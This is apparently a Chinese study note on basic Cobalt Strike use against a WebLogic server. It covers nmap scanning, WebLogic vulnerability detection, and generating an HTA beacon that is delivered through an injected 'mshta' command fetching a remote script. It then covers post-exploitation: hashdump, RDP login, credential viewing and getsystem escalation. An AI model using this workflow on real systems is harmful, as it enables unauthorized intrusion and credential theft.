学了一下cs的简单利用
信息收集
nmap -sT -T4 -p- 地址
weblogic
出现端口7001,访问7001,出现Error 404–not found,有weblogic服务,加console,部署console控制台页面,自动跳到登陆页面。
weblogic漏洞探测
工具:weblogic scan脚本
复制相应CVE编号,百度漏洞复现。
此漏洞可以直接执行命令,上传webshell。
反弹shell到cs
生成beacon
添加监听器,生成一个HTML应用程序的后门(选择攻击,生成后门,HTML Application),选择刚刚创建的监听器,powershell。
把文件上传到目标机,攻击->钓鱼攻击->文件下载,查看是否生成,(攻击->web服务管理).
在URL上输入&cmd=mshta +脚本地址(web服务)
—-mshta(windows)自带执行脚本命令。
进入beacon
默认睡眠时间为60s,
可以修改为1s。shell +命令
功能
1、hashdump,获取密码哈希值,
哈希值解密网站:https://www.cmd5.com/
2、远程登陆,端口3389开放
kali:rdesktop -u 账户 -p 密码 目标机器ip地址
当前有人员在使用目标机器时,会被挤掉,再次登陆,管理员可以看见操作。
3、文件管理
4、凭证信息,可以看到哈希值和明文密码。
5、提权getuid
6、得到system权限getsystem